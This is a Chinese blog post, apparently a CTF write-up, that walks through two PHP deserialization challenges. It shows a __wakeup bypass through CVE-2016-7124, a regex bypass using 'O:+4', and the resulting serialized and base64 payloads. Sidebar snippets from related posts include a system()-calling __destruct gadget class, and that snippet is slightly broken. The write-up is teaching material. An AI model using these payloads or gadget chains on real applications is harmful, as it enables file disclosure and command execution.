CTF中的反序列化题目

最新推荐文章于 2025-05-23 20:15:54 发布
最新推荐文章于 2025-05-23 20:15:54 发布
阅读量1k 收藏 24
点赞数 18
CC 4.0 BY-SA版权
文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50372036/article/details/139973059

0x00 CTF中的反序列化题目

这类题目中主要是利用反序列化各种魔术方法的绕过或调用,从而构造符合条件的序列化字符串,完成特定的功能,在这一点上对于整个代码段的执行流程要很清楚。

0x01 攻防世界unserialize3

题目显示的源码为:

class xctf{ 
    public $flag = '111';
    public function __wakeup(){
    exit('bad requests');
}
?code=

在这里我们可以看到只有一个魔术方法,而__wakeup()魔术方法是反序列化之前检查执行的函数,也就是说,不管传入什么,都会优先执行__wakeup()方法,但这里针对__wakeup()方法有一个CVE漏洞,CVE-2016-7124,在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行,即当前函数中只有一个参数$flag,若传入的序列化字符串中的参数个数为2即可绕过。
如下:

<?php
class xctf{ 
    public $flag = '111';
}
$a = new xctf();
echo serialize($a);

得到结果O:4:"xctf":1:{s:4:"flag";s:3:"111";},将类xctf中的参数1修改为2,提交code,得到flag。

0x02 攻防世界Web_php_unserialize

题目源码为:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

这里首先是一个代码审计,代码部分比较简单,大佬肯定一眼就知道这里只需要绕过preg_match正则和__wakeup函数即可,因为这里weakup会将马上就要反序列化的字串中file给你替换为index,这样就回到现在的页面了。
首先是正则绕过:/[oc]:\d+:/i
这段正则的意思是匹配所有的以o、c、O、C开头,加冒号:,加数字、再加冒号:的字符串,忽略大小写,也就是o:4:这部分序列化串开头的匹配。这里使用+4绕过,这是因为这样即绕过了这里正则的条件,由不会改变o后面的值,因为+4与4是相同的,不会影响反序列化的结果。
其次是wakeup,wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了,但是注意这里file 的类型是private,所以打印出来的串是有不可见字符%00的,不要复制出来自己base,不然结果就不一样了。
O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.php";}

$a= new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace("O:4","O:+4",$b);
$b = str_replace(":1:",":2:",$b);
echo base64_encode($b);

最终结果为:index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4Oi

最低0.47元/天 解锁文章

200万优质内容无限畅学
Visianlee
关注
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 5822
代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用故需要运行call方法而call方法是在对象上下文中调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法中并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destru
[渗透测试笔记] 14.php反序列化及利用原理
H4ppyD0g的博客
09-30 794
php序列化与反序列化 php序列化就是将复杂的数据类型(比如说数组,字典,或者一个对象)转换为字符串,方便传输或者存库等操作,并且之后还能后恢复成原来的数据类型的过程。这样可以在不用这个数据的时候让它占用尽可能少的空间。 要注意的是,序列化只是对他的变量进行序列化,类中的函数是不会参与进来的。 php序列化与反序列化的函数 serialize() 用于序列化对象或数组,并返回一个字符串。序列化对象后,可以很方便的将它传递给其他需要它的地方,且其类型和结构不会改变。 unseriali
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
CTFSHOW】web入门反序列化
7ruth0hn的博客
07-25 3800
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
CTF 解题:ezbypass-cat
最新发布
井底之蛙见世界
05-23 708
本次CTF题目涉及PHP反序列化漏洞,目标代码通过unserialize函数处理用户可控的$_POST['ctf']参数,触发__wakeup和__destruct魔术方法。__destruct方法在method为"ping"时,通过call_user_func_array调用ping方法,执行用户可控的$ip参数,存在命令注入风险。__wakeup方法会对args数组中的每个元素调用waf函数,过滤包含ls、cat、flag等关键词的字符串。解题步骤包括确定攻击目标、构造合法序列化字符
ctfshow————反序列化
qq_45655564的博客
06-30 982
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
[EIS2019]EzPOP--反序列化题目
Dream'
06-19 1461
题目地址:https://buuoj.cn/challenges#[EIS%202019]EzPOP 发现代码中可利用点只有file_put_contents($filename, $data) ,所以我们从它开始倒推我们需要分别找到$data的链和$filename的链使options['data_compress']=false,不让$data压缩data来自value,$data = $this->serialize($value);,使options['serialize']=trim,这样se
PHP反序列化学习笔记(CTF
就是我的博客
08-26 1722
ctfphp反序列化学习
web | CTF反序列化打法
weixin_46301214的博客
02-21 746
天命:因为是php的上古版本,所以本机无法复现,只能用归纳法解决,就是题海战术找相同点,fuzz来测试新的题目题目二:protected属性,只能用整数2,不能用字符串2。__wakeup函数,private属性。__wakeup函数,private属性。题目一:绕过正则和绕过。题目一:绕过正则和绕过。
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1867
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
PHP反序列化题目记录
BaiScorpio的博客
06-20 994
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
[ctf.show]web入门 反序列化
Huamang的博客
02-20 564
web 254 和反序列化没啥关系,就是代码审计 payload:?username=xxxxxx&password=xxxxxx web 255 账号密码的赋值和上面一样,就是多了一个cookie['user'],用burp抓包解决 highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; p
网鼎杯 AreUSerialz反序列化题目
god_Zeo的安全博客
05-11 1059
看了网鼎杯 AreUSerialz反序列化题目wp 对php反序列化又有了学到了新的知识点,之前都没注意到 标题题目是这样的: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op =
记一道CTF反序列化
Peithon的博客
05-28 9691
0x00 使用burpsuite抓包,在URL上发现有用信息 发现key=123对应一个hash值,该hash的值通过md5解密得到kkkkkk01123,如果我们不是123那么就可以get到flag,构造kkkkkk01456,将其MD5加密,得到2a5414055268d6f1f82288af38e5ce4e,将key和hash替换,构造 index.php?key=456&amp;amp;h...
PHP反序列化练习册
qwsn
11-19 2704
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web
NSSCTF-Web题目17(反序列化
weixin_54055099的博客
06-27 1547
反序列化
----已搬运----2021.6.1 NEWSCTF 萌新赛 -- Web --- weblog ---反序列化
Zero_Adam的博客
06-05 571
目录:一、学到的知识二、学习WP怎么反序列化都是失败了。还能够成功destruct啊。 一、学到的知识 这个代码审计,专门给字符逃逸用的过滤的东西要用上, 关于思路,可以先慢慢来,一步一步debug看看我们需不需要字符逃逸,逃逸那些东西,在哪里进行逃逸。 二、学习WP 这个题,最后还是云里雾里的,,没有弄得十分清楚 直接给了源码: <?php highlight_file(__FILE__); error_reporting(0); class B{ public $logFile;
ctfshow python反序列化 刷题记录
2401_83089819的博客
03-25 1059
先看给的提示:传入的 data 先进行 base64 解码后在进行反序列化,所以我们序列化完成之后还要额外进行 base64 编码。在 http://ceye.io/profile 下的 Identifier 可以获取对应 url。,也可以在 http://ceye.io/payloads 中找相对应的 payload。的作用是将请求中的参数添加到 URL 中,以便将这些参数传递给服务器。是一个在命令行下使用的下载工具,它可以从指定的URL下载文件。有两种方法:反弹 shell 和 的 dns 外带。
CTF关于反序列化练习随笔记录
2301_80127209的博客
05-08 1088
destruct 析构方法,PHP将在对象被销毁前(即从内存中清除前)调用这个方法 默认情况下,PHP仅仅释放对象属性所占用的内存并销毁对象相关的资源.,析构函数允许你在使用一个对象之后执行任意代码来清除内存,当PHP决定你的脚本不再与对象相关时,析构函数将被调用.在一个函数的命名空间内,这会发生在函数return的时候,对于全局变量,这发生于脚本结束的时候,如果你想明确地销毁一个对象,你可以给指向该对象的变量分配任何其它值,通常将变量赋值勤为NULL或者调用unset。PHP5.3.0以上版本有效。
ctf反序列化题目
01-17
### CTF 反序列化题目解题思路和技巧 #### 理解PHP反序列化机制 在处理CTF中的PHP反序列化题目时,理解`serialize()`和`unserialize()`函数的工作原理至关重要。当对象被序列化后,其状态会被转换成字符串形式以便于传输或存储;而在反序列化过程中,则会将这些字符串重新构造成原始的对象实例[^2]。 #### 构建恶意payload 构建有效的攻击载荷通常涉及利用特定类的方法来触发预期的行为。例如,在给定的例子中,通过构造特殊的输入参数并传递给`$_GET`超全局数组成员变量,可以控制程序流从而实现远程命令执行或其他有害操作[^3]。 #### 利用魔术方法 某些情况下,可以通过操控含有特殊名称(即所谓的“魔法”)的方法来进行攻击。比如`__wakeup()`会在调用`unserialize()`之后立即被执行,这使得它成为一个潜在的安全风险点——特别是当该方法内部包含了危险的操作如`eval()`时[^5]。 #### 绕过安全检测逻辑 有时挑战者可能会设置一些简单的防护措施试图阻止非法的数据提交。了解如何巧妙地绕开这类检查也是成功解决问题的关键之一。例如,针对条件语句`if (strstr($_GET["c"], "popko") === false)`,可以选择适当调整发送的内容使其不包含敏感关键字以规避过滤[^4]。 ```php // 示例:创建一个带有恶意代码的可序列化对象 class Exploit { public $cmd; function __construct($command){ $this->cmd=$command; } function __destruct(){ system($this->cmd); } } $malicious_obj = new Exploit('id'); serialized_data=serialize($malicious_obj); // 发送经过编码后的数据至目标服务器 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值